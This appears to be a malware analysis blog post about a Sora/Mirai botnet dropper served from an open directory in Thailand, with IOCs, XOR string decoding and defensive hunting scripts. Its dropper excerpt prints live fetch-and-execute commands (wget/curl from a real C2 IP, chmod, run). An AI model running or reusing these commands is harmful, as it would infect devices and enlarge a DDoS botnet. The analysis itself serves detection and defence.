ohshit.sh: Inside a Sora/Mirai Botnet Dropper Targeting 15 CPU Architectures From an Open Directory in Thailand
subtitle: "A live C2 server with directory listing enabled exposes the full payload inventory of a fresh Mirai campaign wave -- plus an XOR-encoded command dump and 14 binaries from the open directory"
tags: ["Mirai", "Sora", "IoT", "botnet", "shell-script", "UPX", "open-directory", "Thailand"]
A shell script named ohshit.sh showed up on MalwareBazaar on March 12, 2026. It is exactly what it looks like -- a Mirai variant dropper -- but the operator left the C2 server's directory listing wide open, giving us a full inventory of their payload arsenal: 14 UPX-packed ELF binaries (the dropper requests payloads for 15 CPU architectures), all built within a one-minute window on March 8, 2026. The server at 45[.]141[.]26[.]73, hosted by Cloudforest CO., LTD in Bangkok, Thailand, was still live and serving payloads at the time of analysis.
The "Sora" naming convention traces back to at least August 2024 on MalwareBazaar, but this is a fresh campaign wave with new binaries and a new process masquerade name: "Chaotic."
Key Findings
- LIVE open directory at 45[.]141[.]26[.]73 exposing all payloads and the dropper script itself
- 15 architectures targeted: x86, x86_64, i686, ARM (4 variants), MIPS (3 variants), ARC, PowerPC, SPARC, Motorola 68000, SuperH4 -- covering most embedded Linux devices in use
- Binaries compiled 2026-03-08 15:12 UTC -- dropper created one minute later at 15:13 UTC
- String-table analysis: single-byte XOR key 0x02 obfuscates the strings embedded in the bot, 52 decoded strings extracted from the binary, 14 binaries retrieved from the open directory
- UPX 3.94 packed, statically linked, section headers stripped -- standard Mirai anti-analysis
- Server fingerprint anomaly: Shodan CPEs show Microsoft Kerberos + nginx + Node.js/Express alongside Apache, suggesting a compromised Windows server repurposed for malware distribution
- Dual download mechanism: the script tries both wget and curl, so a device that ships only one of them still fetches the payload
The Dropper
The script is 19 lines of bash that tries every supported Linux architecture in turn:

```bash
#!/bin/bash
ulimit -n 1024                 # set the open-file limit to 1024 (more sockets for flooding than most embedded defaults)
cp /bin/busybox /tmp/          # copy busybox alongside the payloads
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://45.141.26.73/bins/sora.<arch>;
curl -O http://45.141.26.73/bins/sora.<arch>;
cat sora.<arch> >Chaotic;      # copy via cat so the on-disk name is "Chaotic"
chmod +x *;
./Chaotic
```
This pattern repeats for each of the 15 architectures. The script downloads every binary, copies each to "Chaotic," makes it executable, and runs it. Binaries built for a different CPU fail with an exec format error and the script moves on; the one that does match forks into the background (standard Mirai behaviour), so the script keeps going and overwrites Chaotic with the next candidate. Crude but effective: any device with a writable drop directory, wget or curl, and a matching binary on the server gets infected, and the operator never has to fingerprint the target first.
Architecture Coverage
| Architecture | Binary | Size | Target Devices |
|---|---|---|---|
| x86 | sora.x86 | 38K | Embedded systems, VMs |
| x86_64 | sora.x86_64 | 50K | 64-bit Linux servers |
| ARM | sora.arm | 47K | IoT cameras, NAS devices |
| ARMv5 | sora.arm5 | 16K | Older ARM (XScale) |
| ARMv6 | sora.arm6 | 52K | Raspberry Pi 1, older SBCs |
| ARMv7 | sora.arm7 | 59K | Modern ARM IoT, RPi 2/3 |
| MIPS | sora.mips | 52K | Broadcom/Qualcomm routers |
| MIPSEL | sora.mpsl | 52K | Consumer routers (little-endian) |
| ARC | sora.arc | 105K | ARC-based IoT SoCs |
| PowerPC | sora.ppc | 47K | Older Apple/IBM, some routers |
| SPARC | sora.spc | 112K | Sun/Oracle, telco equipment |
| M68K | sora.m68k | 147K | Legacy embedded systems |
| SuperH4 | sora.sh4 | 112K | Set-top boxes, industrial |
| i686 | sora.i686 | 39K | 32-bit Intel systems |
Note: sora.mips64 is referenced in the script but missing from the server -- either a build failure or not yet deployed. The script also requests sora.sparc while the server hosts sora.spc, so the SPARC download fails and that binary is never delivered: a build/deploy mismatch that reveals sloppy tooling. Effective coverage is therefore 13 architectures, not the 15 the script requests.
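The mismatch above is exactly the kind of thing that falls out of diffing what the dropper asks for against what the open directory serves. The following Python is an added example written for this page, not code from the original analysis: it parses a dropper in the shape shown above (a constructed three-architecture excerpt, not the real ohshit.sh), pulls out the download URLs, payload names, the execution name and the cd fallback chain, and compares the requested payloads against a constructed stand-in for the /bins/ listing. The regexes and the listing dictionary are assumptions made for the example.

```python
import re

# Constructed excerpt in the shape of the dropper shown above (hypothetical text,
# not the real ohshit.sh): one fetch-and-run chain per architecture.
SAMPLE_DROPPER = """#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.141.26.73/bins/sora.x86; curl -O http://45.141.26.73/bins/sora.x86; cat sora.x86 >Chaotic; chmod +x *; ./Chaotic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.141.26.73/bins/sora.sparc; curl -O http://45.141.26.73/bins/sora.sparc; cat sora.sparc >Chaotic; chmod +x *; ./Chaotic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.141.26.73/bins/sora.mips64; curl -O http://45.141.26.73/bins/sora.mips64; cat sora.mips64 >Chaotic; chmod +x *; ./Chaotic
"""

# Constructed stand-in for the open /bins/ directory listing (filename -> size in bytes).
SAMPLE_LISTING = {"sora.x86": 38_000, "sora.spc": 112_000}

URL_RE = re.compile(r"https?://[^\s;'\"]+")        # wget/curl targets
EXEC_RE = re.compile(r"(?:^|\s)\./(\S+)\s*$")       # trailing ./Name on the chain
CD_RE = re.compile(r"\bcd\s+(/[^\s;]*)")            # the cd fallback chain


def parse_dropper(text):
    """Extract URLs, payload filenames, hosts, execution names and drop dirs."""
    urls, payloads, exec_names, drop_dirs = [], set(), set(), []
    for line in text.splitlines():
        line = line.strip()
        for url in URL_RE.findall(line):
            if url not in urls:
                urls.append(url)
            payloads.add(url.rsplit("/", 1)[-1])
        m = EXEC_RE.search(line)
        if m:
            exec_names.add(m.group(1))
        for d in CD_RE.findall(line):
            if d not in drop_dirs:
                drop_dirs.append(d)
    hosts = sorted({u.split("/")[2] for u in urls})
    return {
        "urls": urls,
        "payloads": sorted(payloads),
        "hosts": hosts,
        "exec_names": sorted(exec_names),
        "drop_dirs": drop_dirs,
    }


def diff_inventory(requested, listing):
    """Requested files absent from the server never infect anything; files on the
    server that nothing requests are dead weight or, as here, a naming mismatch."""
    req, have = set(requested), set(listing)
    return {
        "missing": sorted(req - have),        # requested but not served
        "unrequested": sorted(have - req),    # served but never requested
        "effective": sorted(req & have),      # the only payloads that can land
    }


def defang(s):
    """Defang a URL or IP for safe inclusion in a report."""
    return s.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    parsed = parse_dropper(SAMPLE_DROPPER)
    for url in parsed["urls"]:
        print("fetches", defang(url))
    print("drop dirs:", " -> ".join(parsed["drop_dirs"]))
    print("runs as:", parsed["exec_names"])
    print(diff_inventory(parsed["payloads"], SAMPLE_LISTING))
```

Run against the real script and the real listing, the "missing" list is the mips64/sparc gap and the "unrequested" list is the orphaned sora.spc; the "effective" list is what an incident responder should actually expect to find on disk.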
C2 Command Dump
Decoding the bot's embedded string table with the single-byte XOR key 0x02 (the same scheme as Mirai's table.c, which XORs every byte of each configuration string) yielded 52 strings. These include the standard Mirai DDoS attack vectors (UDP flood, SYN flood, ACK flood, GRE flood) plus scanner configuration, the credential list used for brute-forcing, and self-propagation strings. The full set confirms this variant retains Mirai's core DDoS-for-hire functionality while adding the "Chaotic" branding.
All 14 binaries were retrieved from the open directory ahead of any takedown, preserving the complete payload inventory for further analysis.
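How the decode works, as an added example for this page (not the author's tooling): a single-byte XOR is trivially brute-forced, and in a Mirai-style table the four key bytes are applied in turn to every byte, which collapses to one effective byte, so the same 256-key search covers stock Mirai and variants like this one. The block below decodes a constructed sample table (strings of the kind Mirai embeds, obfuscated with 0x02 and NUL-separated; not bytes from the real sora binaries), and recovers the key by scoring each candidate against a few crib strings one expects in a Mirai bot. The crib list and the sample blob are assumptions made for the example.

```python
import re

# Crib strings a Mirai-family bot almost always carries in its table (assumption).
CRIBS = (b"/proc/", b"/dev/watchdog", b"busybox")


def xor_bytes(data, key):
    """Single-byte XOR. Mirai's table.c XORs each byte with its four key bytes in
    turn, which is equivalent to one byte (k1 ^ k2 ^ k3 ^ k4), so this covers it."""
    return bytes(b ^ key for b in data)


def extract_strings(blob, key, min_len=4):
    """Decode with `key` and return runs of printable ASCII of at least min_len."""
    plain = xor_bytes(blob, key)
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, plain)]


def score_key(blob, key, cribs=CRIBS):
    """How many cribs appear in the blob once decoded with `key`."""
    plain = xor_bytes(blob, key)
    return sum(1 for c in cribs if c in plain)


def guess_key(blob, cribs=CRIBS):
    """Try all 256 single-byte keys; return (best_key, score). Key 0 is a valid
    answer, which handles an unobfuscated build too."""
    best = max(range(256), key=lambda k: (score_key(blob, k, cribs), -k))
    return best, score_key(blob, best, cribs)


# Constructed sample table: NUL-separated strings obfuscated with 0x02, wrapped in
# non-text filler so the decoder has something to ignore. Not real sample data.
SAMPLE_TABLE = [b"/proc/", b"/dev/watchdog", b"/bin/busybox", b"Chaotic", b"UDP", b"SYN"]
SAMPLE_BLOB = (
    b"\x00\xff\xfe\x00"
    + b"".join(xor_bytes(s, 0x02) + b"\x00" for s in SAMPLE_TABLE)
    + b"\x80\x81\x82"
)


if __name__ == "__main__":
    key, score = guess_key(SAMPLE_BLOB)
    print("best key 0x%02x (%d cribs matched)" % (key, score))
    for s in extract_strings(SAMPLE_BLOB, key, min_len=3):
        print(" ", s)
```

On a real UPX-packed sample, unpack first (`upx -d`) and feed the whole file; the crib score separates the true key from the 255 wrong ones cleanly because a wrong key turns the table into noise rather than into different readable text.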
Infrastructure
| IP | ASN | Provider | Country | Status |
|---|---|---|---|---|
| 45[.]141[.]26[.]73 | AS142299 | Cloudforest CO., LTD | Thailand (Bangkok) | LIVE |
| 45[.]141[.]26[.]76 | AS142299 | Cloudforest CO., LTD | Thailand | Adjacent (RDP) |
Cloudforest appears to be a legitimate Thai hosting company running Grafana, AdGuard DNS, and Uptime Kuma. The malware distribution is likely from a customer VPS, not Cloudforest themselves. The /23 block (45.141.26.0/23) was allocated via PREFIXBROKER IP brokerage in November 2022.
IOCs
Network:
45[.]141[.]26[.]73 # C2 / malware distribution
hxxp://45[.]141[.]26[.]73/ohshit[.]sh # Dropper script
hxxp://45[.]141[.]26[.]73/bins/sora[.]* # Payload directory
File Hashes:
| SHA-256 | File |
|---|---|
| 5079206433607fd6dc1af3bf52cedce1a3be292048ada3338620fe9aee26283a | ohshit.sh |
| 3247319c4f6220528565e6dc67893af871eb946ce9fb519b46c6a2ccb24dfc31 | sora.x86 |
| 6f27a543fd302747782dcab22e7e81ebb1b37b272ff8a460765b856c202c06a5 | sora.arm |
| 8d6c715294ff2a9bda70ef9bf4c730280fbca6fe4da717116ecb0ad7d26938ab | sora.mips |
Behavioral:
| Indicator | Value |
|---|---|
| Process Name | Chaotic |
| File Path | /tmp/Chaotic, /tmp/sora.* (falls back to /var/run, /mnt, /root, / if /tmp is unusable) |
| Command | ulimit -n 1024 |
| Command | cp /bin/busybox /tmp/ |
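Hunting for the process name is the concrete action the behavioural IOCs give a responder. The block below is an added example, not tooling from the original write-up: it reads comm and the exe link for every pid under /proc and flags anything named Chaotic, anything executing out of one of the dropper's working directories, or an executable that has been unlinked after launch (Mirai-family bots commonly delete their own binary once running, so the exe link then ends in " (deleted)"). The heuristics, the live /proc reader and the constructed process snapshot used to exercise them are assumptions for the example.

```python
import os

PROCESS_NAME = "Chaotic"
# Working directories the dropper falls through, in order (its cd chain).
# "/" is included for completeness but is the noisiest of the five.
DROP_DIRS = ("/tmp", "/var/run", "/mnt", "/root", "/")
DELETED = " (deleted)"


def classify(rec):
    """Return the reasons a process record looks like the dropped bot (empty if none)."""
    reasons = []
    comm = rec.get("comm", "")
    exe = rec.get("exe", "")
    deleted = exe.endswith(DELETED)
    path = exe[: -len(DELETED)] if deleted else exe
    parent = os.path.dirname(path) if path else ""
    if comm == PROCESS_NAME or os.path.basename(path) == PROCESS_NAME:
        reasons.append("name matches Chaotic")
    if parent in DROP_DIRS:
        reasons.append("executable lives in a dropper working dir (%s)" % parent)
    if deleted and parent in DROP_DIRS:
        reasons.append("executable unlinked after launch")
    return reasons


def hunt(records):
    """Map pid -> reasons for every record that trips at least one heuristic."""
    hits = {}
    for rec in records:
        reasons = classify(rec)
        if reasons:
            hits[rec["pid"]] = reasons
    return hits


def live_records(proc="/proc"):
    """Snapshot comm and exe for every pid; entries we cannot read (permissions,
    processes that exit mid-scan) are skipped rather than aborting the sweep."""
    out = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "comm")) as f:
                comm = f.read().strip()
            exe = os.readlink(os.path.join(proc, pid, "exe"))
        except OSError:
            continue
        out.append({"pid": int(pid), "comm": comm, "exe": exe})
    return out


# Constructed snapshot (not from a real host) to exercise the heuristics offline.
SAMPLE_RECORDS = [
    {"pid": 1, "comm": "init", "exe": "/sbin/init"},
    {"pid": 311, "comm": "nginx", "exe": "/usr/sbin/nginx"},
    {"pid": 4821, "comm": "Chaotic", "exe": "/tmp/Chaotic (deleted)"},
    {"pid": 4833, "comm": "busybox", "exe": "/tmp/busybox"},
    {"pid": 4900, "comm": "Chaotic", "exe": "/var/run/Chaotic"},
]


if __name__ == "__main__":
    records = live_records() if os.path.isdir("/proc") else SAMPLE_RECORDS
    for pid, reasons in sorted(hunt(records).items()):
        print(pid, "; ".join(reasons))
```

Run it as root so the exe links of every process are readable; an unprivileged run silently skips other users' processes, which is exactly where a bot launched from a root shell will be.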
MITRE ATT&CK
| Technique | ID | Application |
|---|---|---|
| Exploit Public-Facing Application | T1190 | IoT device exploitation |
| Valid Accounts: Default Accounts | T1078.001 | Telnet/SSH login with default credentials |
| Unix Shell | T1059.004 | ohshit.sh bash dropper |
| Software Packing | T1027.002 | UPX 3.94 packing |
| Masquerading | T1036 | Binary renamed to "Chaotic" |
| Network Denial of Service | T1498 | Mirai DDoS capability |
| Ingress Tool Transfer | T1105 | wget/curl payload download |
Conclusion
This is commodity botnet infrastructure with commodity OPSEC failures -- open directory listing, consistent naming conventions across 18+ months, no obfuscation of the dropper, no access control on the distribution server. But the intended architecture coverage is broad: 15 targets from Raspberry Pis to SPARC, even if the missing mips64 build and the sora.sparc/sora.spc mismatch mean only 13 of them can actually be delivered right now. The one-minute build window (15:12-15:13 UTC) and the fresh March 8 build date show the campaign is being actively rebuilt and redeployed. The "Chaotic" branding and Thai hosting infrastructure distinguish this wave from other Sora operators. Block 45[.]141[.]26[.]73, and hunt for the process name and for executables running out of /tmp.